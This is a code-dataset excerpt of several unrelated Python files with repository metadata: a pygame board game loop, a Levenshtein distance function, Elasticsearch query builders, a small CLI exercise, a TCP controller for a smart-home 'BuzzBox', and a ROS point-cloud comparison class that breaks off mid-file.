sqSelected = () #deselect
playerClicks = [] #clear player clicks
if gs.whiteToMove:
Valid = gs.validateMove(Wmoves, move)
if Valid == True:
g = copy.deepcopy(gs)
g.makeMove(copy.deepcopy(move))
Bmoves1 = g.getMoves("Black")
C = g.checkCheck("White", Bmoves1)
else:
Valid = gs.validateMove(Bmoves, move)
if Valid == True:
g = copy.deepcopy(gs)
g.makeMove(copy.deepcopy(move))
Wmoves1 = g.getMoves("White")
C = g.checkCheck("Black", Wmoves1)
if Valid == True and len(C) == 0:
movestack = []
move.pieceMoved.Promotable = move.checkPromote(move.pieceMoved)
gs.makeMove(move)
gs.moveLog.append(move) #log move
gs.whiteToMove = not gs.whiteToMove
Wmoves = gs.getMoves("White")
Bmoves = gs.getMoves("Black")
Wchecks = gs.checkCheck("White", Bmoves)
Bchecks = gs.checkCheck("Black", Wmoves)
move.pieceMoved.Promotable = move.checkPromote(move.pieceMoved)
if move.pieceMoved.Promotable == True and move.pieceMoved.Promotion != True:
drawPromotion(screen)
p.display.update()
#print promote button
Zrunning = True
while Zrunning:
for e in p.event.get():
if e.type == p.QUIT:
running = False
Zrunning = False
if e.type == p.MOUSEBUTTONDOWN:
location = p.mouse.get_pos() #x,y location of mouse
if location[0] >= 1000//scale and location[0] <= (1000+156)//scale and location[1] >= 1000//scale and location[1] <= (1000 + 156)//scale:
move.pieceMoved.Promotion = True
Zrunning = False
elif location[0] >= (1000+156)//scale and location[0] <= (1000+ 2*156)//scale and location[1] >= 1000//scale and location[1] <= (1000 + 156)//scale:
Zrunning = False
pass
else:
sqSelected = () #deselect
playerClicks = [] #clear player clicks
GO = gameOver(gs, Bmoves, Wmoves)
elif len(playerClicks) == 1 and Dfound == True:
if F.Name == "Pawn" or F.Name == "Night" or F.Name == "Lance":
if row == 0 and gs.whiteToMove or row == 8 and not gs.whiteToMove:
sqSelected = () #deselect
playerClicks = [] #clear player clicks
Dfound = False
if F.Name == "Pawn" and not F.Promotion:
for i in range(gs.dimensionsx):
if gs.board[i][col].Name == F.Name and gs.board[i][col].Color == F.Color:
sqSelected = () #deselect
playerClicks = [] #clear player clicks
Dfound = False
break
if gs.board[row][col].Name == "Null":
movestack = []
if gs.whiteToMove:
F.Color = "White"
F.Direction = 1
F.Position = (row, col)
F.Promotable = False
F.Promotion = False
gs.board[row][col] = F
#gs.board[row][col] = FPiece.Pawn("White", F.Name, (row, col), 1)
c = 0
for i in gs.Wcapture:
if i.Name == F.Name:
gs.Wcapture.pop(c)
break
c = c + 1
elif not gs.whiteToMove:
F.Color = "Black"
F.Direction = -1
F.Position = (row, col)
F.Promotable = False
F.Promotion = False
gs.board[row][col] = F
c = 0
for i in gs.Bcapture:
if i.Name == F.Name:
gs.Bcapture.pop(c)
break
c = c + 1
Dfound = False
gs.whiteToMove = not gs.whiteToMove
#add code to check if move causes checkmate
sqSelected = () #deselect
playerClicks = [] #clear player clicks
GO = gameOver(gs, Bmoves, Wmoves)
if location[0] >= 1506//scale and location[0] <=1662//scale and location[1] >= 82//scale and location[1] <= 130:
if len(gs.moveLog) != 0:
t = gs.moveLog.pop()
gs.board = t.boardHis
gs.whiteToMove = t.whiteMove
gs.Wcapture = t.boardCapW
gs.Bcapture = t.boardCapB
gs.Wtimer = t.timeW
gs.Btimer = t.timeB
Wmoves = gs.getMoves("White")
Bmoves = gs.getMoves("Black")
sqSelected = () #deselect
playerClicks = [] #clear player clicks
GO = gameOver(gs, Bmoves, Wmoves)
drawGameState(screen, gs, playerClicks, Wmoves, Bmoves, GO, MH, COLOR, SQ_size)
clock.tick(MAX_FPS)
p.display.flip()
if not quit:
Erunning = True
while Erunning:
drawGameState(screen, gs, playerClicks, Wmoves, Bmoves, GO, MH, COLOR, SQ_size)
clock.tick(MAX_FPS)
p.display.flip()
for e in p.event.get():
if e.type == p.QUIT:
Erunning = False
p.display.quit()
return False
if e.type == p.KEYDOWN:
if e.key == p.K_BACKSPACE:
Erunning = False
p.display.quit()
return True
elif e.key == p.K_ESCAPE:
Erunning = False
p.display.quit()
return False
if __name__ == "__main__":
running = True
while running:
running = main()
| 43.537893 | 263 | 0.484164 | 2,774 | 23,554 | 4.086518 | 0.142394 | 0.019054 | 0.016673 | 0.022495 | 0.477064 | 0.440014 | 0.369972 | 0.320219 | 0.270995 | 0.251323 | 0 | 0.049256 | 0.389743 | 23,554 | 540 | 264 | 43.618519 | 0.739391 | 0.089879 | 0 | 0.412322 | 0 | 0 | 0.03322 | 0.001056 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030806 | false | 0.00237 | 0.014218 | 0 | 0.056872 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b4adf85d7a1a04cebb1c8771aa76f2f5d18e037 | 505 | py | Python | others/levenshtein.py | Mifour/Algorithms | 77cfafc49bc0130da0f6041b169a15053f81af87 | [
"MIT"
] | null | null | null | others/levenshtein.py | Mifour/Algorithms | 77cfafc49bc0130da0f6041b169a15053f81af87 | [
"MIT"
] | null | null | null | others/levenshtein.py | Mifour/Algorithms | 77cfafc49bc0130da0f6041b169a15053f81af87 | [
"MIT"
] | null | null | null | import numpy as np
def levenshtein(first, second):
"""
O(nm) time & space for word of n and m characters
"""
n = len(first)
m = len(second)
matrix = np.array([np.arange(m)+i+1 for i in range(n)])
for i in range(1, n):
for j in range(1, m):
matrix[i,j] = min(
matrix[i-1, j] +1,
matrix[i, j-1] +1,
matrix[i-1, j-1] + int(first[i-1] != second[j-1])
)
return matrix[n-1,m-1]
print(levenshtein('audi', 'lada'))
# expect 3
print(levenshtein('totoro', 'ototoro'))
# expect 1 | 21.956522 | 56 | 0.592079 | 94 | 505 | 3.180851 | 0.404255 | 0.026756 | 0.040134 | 0.073579 | 0.06689 | 0 | 0 | 0 | 0 | 0 | 0 | 0.037688 | 0.211881 | 505 | 23 | 57 | 21.956522 | 0.713568 | 0.136634 | 0 | 0 | 0 | 0 | 0.049412 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.066667 | 0 | 0.2 | 0.133333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b52819344cdd9b254cb63f54c8459751f763cd8 | 2,781 | py | Python | dp_conceptual_search/ons/search/queries/ons_query_builders.py | flaxandteal/dp-conceptual-search | 16c6383a61ba5b7069337c2626a0dc243bfe9d35 | [
"MIT"
] | 3 | 2018-05-10T16:49:27.000Z | 2022-03-29T15:23:04.000Z | dp_conceptual_search/ons/search/queries/ons_query_builders.py | flaxandteal/dp-conceptual-search | 16c6383a61ba5b7069337c2626a0dc243bfe9d35 | [
"MIT"
] | 2 | 2018-09-20T06:37:27.000Z | 2018-11-12T12:05:08.000Z | dp_conceptual_search/ons/search/queries/ons_query_builders.py | flaxandteal/dp-conceptual-search | 16c6383a61ba5b7069337c2626a0dc243bfe9d35 | [
"MIT"
] | 3 | 2018-06-25T10:48:43.000Z | 2021-04-11T08:01:27.000Z | """
Defines a series of useful Elasticsearch queries for the ONS
"""
from typing import List
from elasticsearch_dsl import query as Q
from elasticsearch_dsl.aggs import A as Aggregation
from dp_conceptual_search.ons.search.fields import AvailableFields
from dp_conceptual_search.ons.search.content_type import ContentType
from dp_conceptual_search.search.query_helper import match, multi_match
def build_type_counts_query() -> Aggregation:
"""
Helper method for generating ONS type counts aggregation
:return:
"""
return Aggregation("terms", field=AvailableFields.TYPE.value.name)
def build_departments_query(search_term: str) -> Q.Query:
"""
Returns the ONS departments query
:param search_term:
:return:
"""
return Q.Match(**{"terms": {"query": search_term, "type": "boolean"}})
def build_content_query(search_term: str, **kwargs) -> Q.DisMax:
"""
Returns the default ONS content query
:param search_term:
:return:
"""
q = Q.DisMax(
queries=[
Q.Bool(
should=[
match(AvailableFields.TITLE_NO_DATES.value.name, search_term, type="boolean", boost=10.0,
minimum_should_match="1<-2 3<80% 5<60%"),
match(AvailableFields.TITLE_NO_STEM.value.name, search_term, type="boolean", boost=10.0,
minimum_should_match="1<-2 3<80% 5<60%"),
multi_match([AvailableFields.TITLE.value.field_name_boosted, AvailableFields.EDITION.value.field_name_boosted], search_term,
type="cross_fields", minimum_should_match="3<80% 5<60%")
]
),
multi_match([AvailableFields.SUMMARY.value.name, AvailableFields.META_DESCRIPTION.value.name], search_term,
type="best_fields", minimum_should_match="75%"),
match(AvailableFields.KEYWORDS.value.name, search_term, type="boolean", operator="AND"),
multi_match([AvailableFields.CDID.value.name, AvailableFields.DATASET_ID.value.name], search_term),
match(AvailableFields.SEARCH_BOOST.value.name, search_term, type="boolean", operator="AND", boost=100.0)
],
**kwargs
)
return q
def build_function_score_content_query(query: Q.Query, content_types: List[ContentType], boost: float=1.0) -> Q.Query:
"""
Generate a function score query using ContentType weights
:param query:
:param content_types:
:param boost:
:return:
"""
function_scores = []
content_type: ContentType
for content_type in content_types:
function_scores.append(content_type.filter_function())
return Q.FunctionScore(query=query, functions=function_scores, boost=boost)
| 36.116883 | 144 | 0.667026 | 333 | 2,781 | 5.366366 | 0.282282 | 0.067152 | 0.054841 | 0.063794 | 0.225518 | 0.183548 | 0.148853 | 0.117515 | 0.071628 | 0.071628 | 0 | 0.016698 | 0.224739 | 2,781 | 76 | 145 | 36.592105 | 0.812152 | 0.134484 | 0 | 0.052632 | 0 | 0 | 0.056014 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.105263 | false | 0 | 0.157895 | 0 | 0.368421 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b574f2296ecb2d56b23821c1097178c52787f98 | 1,486 | py | Python | 02_crowsnest/crowsnest.py | leszekgrechowicz/tiny_python_projects | 792c21a9a56c1dbe35d1aa1d4959c030a7921acd | [
"MIT"
] | null | null | null | 02_crowsnest/crowsnest.py | leszekgrechowicz/tiny_python_projects | 792c21a9a56c1dbe35d1aa1d4959c030a7921acd | [
"MIT"
] | null | null | null | 02_crowsnest/crowsnest.py | leszekgrechowicz/tiny_python_projects | 792c21a9a56c1dbe35d1aa1d4959c030a7921acd | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
"""
Author : Leszek Grechowicz <leszek_grechowicz@o2.pl>
Date : 2021-06-13
Purpose: Choose the correct article
"""
import argparse
# --------------------------------------------------
def get_args():
"""Get command-line arguments"""
parser = argparse.ArgumentParser(
description='Choose the correct article ',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('mandatory',
metavar='word',
type=str,
help='A word - mandatory')
parser.add_argument('-s', '--starboard',
action='store_true',
help='changes the side to “starboard”')
return parser.parse_args()
# --------------------------------------------------
def make_sentence(word, side):
"""Produce sentence with appropriate article to the word given"""
article = 'an' if word[0].lower() in ['a', 'e', 'i', 'o', 'u'] else 'a'
if word[0].istitle():
article = article.title()
return f'Ahoy, Captain, {article} {word} off the {side} bow!'
# --------------------------------------------------
def main():
"""Make a jazz noise here"""
args = get_args()
side = 'starboard' if args.starboard else 'larboard'
mandatory_arg = args.mandatory
print(make_sentence(mandatory_arg, side))
# --------------------------------------------------
if __name__ == '__main__':
main()
| 25.62069 | 75 | 0.514132 | 147 | 1,486 | 5.061224 | 0.557823 | 0.043011 | 0.043011 | 0.061828 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010554 | 0.234859 | 1,486 | 57 | 76 | 26.070175 | 0.643799 | 0.298789 | 0 | 0 | 0 | 0 | 0.193103 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.12 | false | 0 | 0.04 | 0 | 0.24 | 0.04 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b5ae9e5749ec7396c079711e82dc60783ccf32d | 6,449 | py | Python | interpreter-server/buzzcommander.py | Anglia-Ruskin-IoT-Labs/avs-device-sdk | 68d4446b3ecbb81cab73d7701ec909f5f3603316 | [
"Apache-2.0"
] | null | null | null | interpreter-server/buzzcommander.py | Anglia-Ruskin-IoT-Labs/avs-device-sdk | 68d4446b3ecbb81cab73d7701ec909f5f3603316 | [
"Apache-2.0"
] | null | null | null | interpreter-server/buzzcommander.py | Anglia-Ruskin-IoT-Labs/avs-device-sdk | 68d4446b3ecbb81cab73d7701ec909f5f3603316 | [
"Apache-2.0"
] | 1 | 2018-08-22T14:35:08.000Z | 2018-08-22T14:35:08.000Z | #!/usr/bin/python3
import socket # used for TCP/IP communication
import smtplib # used to send email report
import time # used to insert current date in email report
import threading
class Buzzbox():
# Constructor, saving constants
def main(self, _ip: str, _port: int, _light: int, _led: int):
self.BUZZBOX_IP = _ip
self.BUZZBOX_PORT = int(_port)
self.LEDNUM = int(_led)
self.LIGHTNUM = int(_light)
def TextCleanup(self, _text: str) -> set:
''' Text formatting and cleanup
'''
text = _text.lower()
text = text.replace(":", "")
text = text.replace(".", "")
text = text.split()
return set(text)
def Command(self, _title: str, _text:str) -> str:
""" Decision tree sends commands
to the BuzzBox based on the
input text. Returns string
feedback if command went
to the Box,
returns None if command was
not valid.
"""
text = self.TextCleanup(_text)
# Preventin guide text to get through
# by limiting length
if not len(text) > 5:
# Decisions based on Alexa textfield
# containing words
if "turning" in text:
if "heater" in text:
command = "HEATER_"
if "on" in text:
command += "ON"
elif "off" in text:
command += "OFF"
else:
return
return self.__ContactBuzzBox((command))
elif "fan" in text:
command = "FAN_"
if "on" in text:
command += "ON"
elif "off" in text:
command += "OFF"
else:
return
return self.__ContactBuzzBox((command))
elif "light" in text:
for item in text:
if item.isdigit():
lightNum = int(item)
if lightNum <= self.LIGHTNUM and lightNum > 0:
return self.__ContactBuzzBox((self.__LightCommandBuilder(lightNum, text)))
elif "led" in text:
for item in text:
if item.isdigit():
ledNum = int(item)
if ledNum <= self.LEDNUM and ledNum > 0:
return self.__ContactBuzzBox(self.__LedCommandBuilder(ledNum, text))
elif "lights" in text:
messages = []
for x in range(1 , (self.LIGHTNUM + 1)):
messages.append(str(self.__ContactBuzzBox(self.__LightCommandBuilder(x, text))))
return messages
elif "leds" in text:
command = "LEDS_ALL"
if "off" in _text:
command += "OFF"
elif "red" in _text or "on" in _text:
command += "R"
elif "yellow" in _text:
command += "Y"
elif "green" in _text:
command += "G"
return self.__ContactBuzzBox(command)
elif "all" in text or "everything" in text:
if "on" in text:
state = "ON"
elif "off" in text:
state = "OFF"
else:
return
messages = []
# LEDs
if state == "ON":
messages.append(self.__ContactBuzzBox(("LEDS_ALLR")))
else:
messages.append(self.__ContactBuzzBox(("LEDS_ALLOFF")))
# Lights
for x in range(1 , (self.LIGHTNUM + 1)):
messages.append(str(self.__ContactBuzzBox(self.__LightCommandBuilder(x, text))))
# Heater and Fan
messages.append(self.__ContactBuzzBox(("HEATER_" + state)))
messages.append(self.__ContactBuzzBox(("FAN_" + state)))
return messages
elif "reading" in text and ("display" in text or
"interface" in text):
if "on" in text:
state = "ON"
elif "off" in text:
state = "OFF"
else:
return
# TODO iMirror connection
return "Reading display turned " + state
else:
return
def GetReadings(self, _title, _text):
text = self.TextCleanup(_text)
if not len(text) > 5:
if "displaying" in text:
command = "GET_"
if "motion" in text and "sensor ":
command += "MOTION"
return self.__ContactBuzzBox((command))
elif "heater" in text:
command += "HEATER"
return self.__ContactBuzzBox((command))
elif "fan" in text:
command += "FAN"
return self.__ContactBuzzBox((command))
elif "light" in text and "level" in text:
command += "LUX"
return self.__ContactBuzzBox((command))
elif "light" in text:
command += "LIGHT"
for item in text:
if item.isdigit():
lightNum = int(item)
if lightNum <= self.LIGHTNUM and lightNum > 0:
command += str(lightNum)
return self.__ContactBuzzBox(command)
elif "led" in text:
command += "LED"
for item in text:
if item.isdigit():
ledNum = int(item)
if ledNum <= self.LEDNUM and ledNum > 0:
command += str(ledNum)
return self.__ContactBuzzBox(command)
elif "temperature" in text:
command += "TEMPERATURE"
return self.__ContactBuzzBox((command))
else:
return
else:
return
#-----------------------------------------------
# SUPPORT METHODS
#-----------------------------------------------
def __ContactBuzzBox(self, _command):
# Prepare 3-byte control message for transmission
TCP_IP = self.BUZZBOX_IP
TCP_PORT = self.BUZZBOX_PORT
BUFFER_SIZE = 80
command = _command + "\n"
command = command.encode('UTF-8')
## possible commands: HELLO\n ,
MESSAGE = command # Relays 1 permanent off
# Open socket, send message, close socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(0.75)
try:
s.connect((TCP_IP, TCP_PORT))
s.send(MESSAGE)
data = s.recv(BUFFER_SIZE)
s.close()
return (_command + ": " + str(data))
except socket.error:
return "Connection to box not available"
def SendCommand(self, _command):
return self.__ContactBuzzBox(_command)
def __LedCommandBuilder(self, _ledNum, _text):
''' Builds command for the leds
according their number and the
asked state. Returns the complete
command.
'''
command = "LED" + str(_ledNum) + "_"
if "off" in _text:
command += "OFF"
elif "red" in _text or "on" in _text:
command += "R"
elif "yellow" in _text:
command += "Y"
elif "green" in _text:
command += "G"
return command
def __LightCommandBuilder(self, _lightNum, _text):
''' Builds command for the lights
according their number and the
asked state. Returns the complete
command.
'''
command = "LIGHT" + str(_lightNum) + "_"
if "on" in _text:
command += "ON"
elif "off" in _text:
command += "OFF"
elif "blink" in _text:
command += "BLINK"
else:
return
return command
def __init__(self, _ip, _port, _light, _led):
self.main(_ip, _port, _light, _led)
| 27.917749 | 86 | 0.609862 | 786 | 6,449 | 4.843511 | 0.215013 | 0.072498 | 0.085369 | 0.089572 | 0.456527 | 0.345679 | 0.344628 | 0.344628 | 0.319149 | 0.315997 | 0 | 0.003993 | 0.262211 | 6,449 | 230 | 87 | 28.03913 | 0.796133 | 0.150876 | 0 | 0.548023 | 0 | 0 | 0.075741 | 0 | 0 | 0 | 0 | 0.004348 | 0 | 1 | 0.050847 | false | 0 | 0.022599 | 0.00565 | 0.220339 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b5b5de9cc4bb46f2ff5bbbe7a01860b9bf18703 | 17,997 | py | Python | pointcloud_diff/scripts/PointCloudDiff.py | 565353780/pytorch-voxblox-plus-plus | fd319495b36651cf8c0c9244e0f664fac1afd5ca | [
"BSD-3-Clause"
] | null | null | null | pointcloud_diff/scripts/PointCloudDiff.py | 565353780/pytorch-voxblox-plus-plus | fd319495b36651cf8c0c9244e0f664fac1afd5ca | [
"BSD-3-Clause"
] | null | null | null | pointcloud_diff/scripts/PointCloudDiff.py | 565353780/pytorch-voxblox-plus-plus | fd319495b36651cf8c0c9244e0f664fac1afd5ca | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import numpy as np
import open3d as o3d
from time import time, sleep
import rospy
from sensor_msgs.point_cloud2 import read_points
from vpp_msgs.srv import GetMap
from tensorboard_logger_ros.msg import Scalar
from tensorboard_logger_ros.srv import ScalarToBool
point_move_dict = {
"01": [-9.2, 0.1, 0],
"02": [0.9, -1.6, 0],
"03": [-8.3, -0.5, 0],
"04": [7.35, -4.2, 0],
"05": [0, -0.4, 0],
"06": [-4.1, -3.32, 0]
}
DEBUG = False
class PointCloudDiff(object):
def __init__(self):
self.scene_pointcloud_folder_path = None
# dataset data
self.scene_pointcloud = None
self.scene_point_num = None
self.object_pointcloud_list = None
self.merge_object_pointcloud = None
self.valid_object_pointcloud_list = None
self.merge_valid_object_pointcloud_list = None
# recon data
self.object_pointcloud_save_path = None
self.object_last_create_time = None
self.object_last_modify_time = None
self.log_start_time = None
self.last_log_time = None
if not DEBUG:
sleep(10)
self.get_map_proxy = rospy.ServiceProxy("/gsm_node/get_map", GetMap)
self.tf_logger_proxy = rospy.ServiceProxy('/tensorboard_logger/log_scalar', ScalarToBool)
return
def loadScenePointCloud(self, scene_pointcloud_folder_path):
self.scene_pointcloud_folder_path = scene_pointcloud_folder_path
if self.scene_pointcloud_folder_path[-1] != "/":
self.scene_pointcloud_folder_path += "/"
scene_idx = self.scene_pointcloud_folder_path.split("/")[-2]
scene_point_move_list = point_move_dict[scene_idx]
if not os.path.exists(self.scene_pointcloud_folder_path):
print("[ERROR][PointCloudDiff::loadScenePointCloud]")
print("\t scene_pointcloud_folder not exist!")
return False
scene_pointcloud_folder_filename_list = \
os.listdir(self.scene_pointcloud_folder_path)
scene_pointcloud_filename = None
for scene_pointcloud_folder_filename in scene_pointcloud_folder_filename_list:
if ".ply" not in scene_pointcloud_folder_filename:
continue
scene_pointcloud_filename = scene_pointcloud_folder_filename
break
scene_pointcloud_file_path = \
self.scene_pointcloud_folder_path + scene_pointcloud_filename
pointcloud_file_path_split_list = scene_pointcloud_file_path.split(".")
if pointcloud_file_path_split_list[-1] == "obj":
mesh = o3d.io.read_triangle_mesh(scene_pointcloud_file_path)
self.scene_pointcloud = o3d.geometry.PointCloud()
scene_pointcloud_points = np.array(mesh.vertices)
scene_pointcloud_points[:, :] += scene_point_move_list
self.scene_pointcloud.points = \
o3d.utility.Vector3dVector(scene_pointcloud_points)
self.scene_point_num = scene_pointcloud_points.shape[0]
return True
self.scene_pointcloud = o3d.io.read_point_cloud(scene_pointcloud_file_path)
scene_pointcloud_points = np.array(self.scene_pointcloud.points)
scene_pointcloud_points[:, :] += scene_point_move_list
self.scene_pointcloud.points = \
o3d.utility.Vector3dVector(scene_pointcloud_points)
self.scene_point_num = scene_pointcloud_points.shape[0]
self.scene_pointcloud.estimate_normals(
search_param=o3d.geometry.KDTreeSearchParamHybrid(
radius=0.1, max_nn=30))
return True
def updateObjectPointCloudSavePath(self):
object_pointcloud_save_basepath = os.path.expanduser('~') + \
"/.ros/RUN_LOG/PointCloud2ToObjectVecConverterServer/"
pointcloud_save_folder_list = os.listdir(object_pointcloud_save_basepath)
if len(pointcloud_save_folder_list) == 0:
print("[ERROR][PointCloudDiff::getObjectPointCloudSavePath]")
print("\t pointcloud_save_folder not exist!")
return False
max_idx_list = None
max_idx_folder_name = None
for pointcloud_save_folder in pointcloud_save_folder_list:
date_split_list = pointcloud_save_folder.split("_")
if len(date_split_list) < 4:
continue
if "-" not in date_split_list[3]:
continue
time_split_list = date_split_list[3].split("-")
if(len(time_split_list) != 3):
continue
current_idx_list = [
int(date_split_list[0]),
int(date_split_list[1]),
int(date_split_list[2]),
int(time_split_list[0]),
int(time_split_list[1]),
int(time_split_list[2])
]
if max_idx_list is None:
max_idx_list = current_idx_list
max_idx_folder_name = pointcloud_save_folder
continue
for i in range(len(max_idx_list)):
if current_idx_list[i] > max_idx_list[i]:
max_idx_list = current_idx_list
max_idx_folder_name = pointcloud_save_folder
break
if current_idx_list[i] < max_idx_list[i]:
break
if max_idx_folder_name is None:
print("[ERROR][PointCloudDiff::getObjectPointCloudSavePath]")
print("\t find latest folder failed!")
return False
self.object_pointcloud_save_path = object_pointcloud_save_basepath + \
max_idx_folder_name + "/"
return True
def getMergePointCloud(self, pointcloud_list):
merge_pointcloud = o3d.geometry.PointCloud()
points_list = []
colors_list = []
for pointcloud in pointcloud_list:
points_list.append(np.array(pointcloud.points))
colors_list.append(np.array(pointcloud.colors))
merge_points = np.concatenate(points_list, axis=0)
merge_colors = np.concatenate(colors_list, axis=0)
merge_pointcloud.points = o3d.utility.Vector3dVector(merge_points)
merge_pointcloud.colors = o3d.utility.Vector3dVector(merge_colors)
return merge_pointcloud
def loadObjectPointCloud(self):
self.object_pointcloud_list = []
scene_idx = self.scene_pointcloud_folder_path.split("/")[-2]
object_point_move_list = point_move_dict[scene_idx]
object_pointcloud_folder_path = self.scene_pointcloud_folder_path + \
"region_objects/"
object_pointcloud_filename_list = os.listdir(object_pointcloud_folder_path)
for object_pointcloud_filename in object_pointcloud_filename_list:
object_pointcloud_filepath = object_pointcloud_folder_path + \
object_pointcloud_filename
object_pointcloud = o3d.io.read_point_cloud(object_pointcloud_filepath)
object_points = np.array(object_pointcloud.points)
object_points[:, :] += object_point_move_list
object_pointcloud.points = \
o3d.utility.Vector3dVector(object_points)
self.object_pointcloud_list.append(object_pointcloud)
self.merge_object_pointcloud = \
self.getMergePointCloud(self.object_pointcloud_list)
self.merge_object_pointcloud.estimate_normals(
search_param=o3d.geometry.KDTreeSearchParamHybrid(
radius=0.1, max_nn=30))
return True
def loadValidObjectPointCloud(self):
self.valid_object_pointcloud_list = []
scene_idx = self.scene_pointcloud_folder_path.split("/")[-2]
object_point_move_list = point_move_dict[scene_idx]
object_pointcloud_folder_path = \
self.scene_pointcloud_folder_path + "valid_region_objects/"
object_pointcloud_filename_list = \
os.listdir(object_pointcloud_folder_path)
for object_pointcloud_filename in object_pointcloud_filename_list:
object_pointcloud_filepath = object_pointcloud_folder_path + \
object_pointcloud_filename
object_pointcloud = o3d.io.read_point_cloud(object_pointcloud_filepath)
object_points = np.array(object_pointcloud.points)
object_points[:, :] += object_point_move_list
object_pointcloud.points = \
o3d.utility.Vector3dVector(object_points)
self.valid_object_pointcloud_list.append(object_pointcloud)
self.merge_valid_object_pointcloud = \
self.getMergePointCloud(self.valid_object_pointcloud_list)
self.merge_valid_object_pointcloud.estimate_normals(
search_param=o3d.geometry.KDTreeSearchParamHybrid(
radius=0.1, max_nn=30))
return True
def loadAllPointCloud(self, scene_pointcloud_folder_path):
if not self.updateObjectPointCloudSavePath():
print("[ERROR][PointCloudDiff::loadAllPointCloud]")
print("\t updateObjectPointCloudSavePath failed!")
return False
if not self.loadScenePointCloud(scene_pointcloud_folder_path):
print("[ERROR][PointCloudDiff::loadAllPointCloud]")
print("\t loadScenePointCloud failed!")
return False
if not self.loadObjectPointCloud():
print("[ERROR][PointCloudDiff::loadAllPointCloud]")
print("\t loadObjectPointCloud failed!")
return False
if not self.loadValidObjectPointCloud():
print("[ERROR][PointCloudDiff::loadAllPointCloud]")
print("\t loadValidObjectPointCloud failed!")
return False
return True
def logScalar(self, name, step, value):
scalar = Scalar()
scalar.name = str(name)
scalar.step = int(step)
scalar.value = float(value)
log_success = self.tf_logger_proxy(scalar)
return log_success
def loadPointCloud2Msg(self, pointcloud2_msg):
point_list = \
read_points(pointcloud2_msg,
skip_nans=True,
field_names=("x", "y", "z"))
point_array = []
for point in point_list:
point_array.append(point[0:3])
pointcloud = o3d.geometry.PointCloud()
pointcloud.points = o3d.utility.Vector3dVector(np.array(point_array))
return pointcloud
def logSceneData(self):
pointcloud2_msg = self.get_map_proxy()
current_pcd = self.loadPointCloud2Msg(pointcloud2_msg.map_cloud)
dist_to_scene = current_pcd.compute_point_cloud_distance(self.scene_pointcloud)
dist_to_scene = np.asarray(dist_to_scene)
avg_dist2_error = 0
for dist in dist_to_scene:
avg_dist2_error += dist * dist
avg_dist2_error /= dist_to_scene.shape[0]
dist_to_recon = \
self.scene_pointcloud.compute_point_cloud_distance(current_pcd)
dist_to_recon = np.asarray(dist_to_recon)
recon_point_num = len(np.where(dist_to_recon < 0.2)[0])
recon_percent = 1.0 * recon_point_num / self.scene_point_num
if not self.logScalar("PointCloudDiff/scene_error",
self.last_log_time - self.log_start_time,
avg_dist2_error):
print("[ERROR][PointCloudDiff::startComparePointCloud]")
print("\t logScalar for point_distance_mean failed!")
return False
if not self.logScalar("PointCloudDiff/scene_completeness",
self.last_log_time - self.log_start_time,
recon_percent):
print("[ERROR][PointCloudDiff::startComparePointCloud]")
print("\t logScalar for recon_percent failed!")
return False
return True
def logObjectData(self):
pointcloud_save_filename_list = \
os.listdir(self.object_pointcloud_save_path)
if len(pointcloud_save_filename_list) == 0:
return True
object_filename_list = []
for pointcloud_save_filename in pointcloud_save_filename_list:
if pointcloud_save_filename[:7] != "object_":
continue
object_filename_list.append(pointcloud_save_filename)
if len(object_filename_list) == 0:
return True
object_current_create_time = os.path.getctime(
self.object_pointcloud_save_path + "object_0.pcd")
object_current_modify_time = os.path.getmtime(
self.object_pointcloud_save_path + "object_0.pcd")
if object_current_create_time == self.object_last_create_time and \
object_current_modify_time == self.object_last_modify_time:
return True
self.object_last_create_time = object_current_create_time
self.object_last_modify_time = object_current_modify_time
recon_object_pointcloud_list = []
for object_filename in object_filename_list:
recon_object_pointcloud = o3d.io.read_point_cloud(
self.object_pointcloud_save_path + object_filename)
if np.array(recon_object_pointcloud.points).shape[0] == 0:
self.object_last_create_time = None
self.object_last_modify_time = None
print("[WARN][PointCloudDiff::logObjectData]")
print("\t object pointcloud files are updating, skip this logging!")
return True
recon_object_pointcloud_list.append(recon_object_pointcloud)
recon_merge_object_pointcloud = self.getMergePointCloud(
recon_object_pointcloud_list)
recon_merge_object_pointcloud.estimate_normals(
search_param=o3d.geometry.KDTreeSearchParamHybrid(
radius=0.1, max_nn=30))
if DEBUG:
o3d.visualization.draw_geometries([
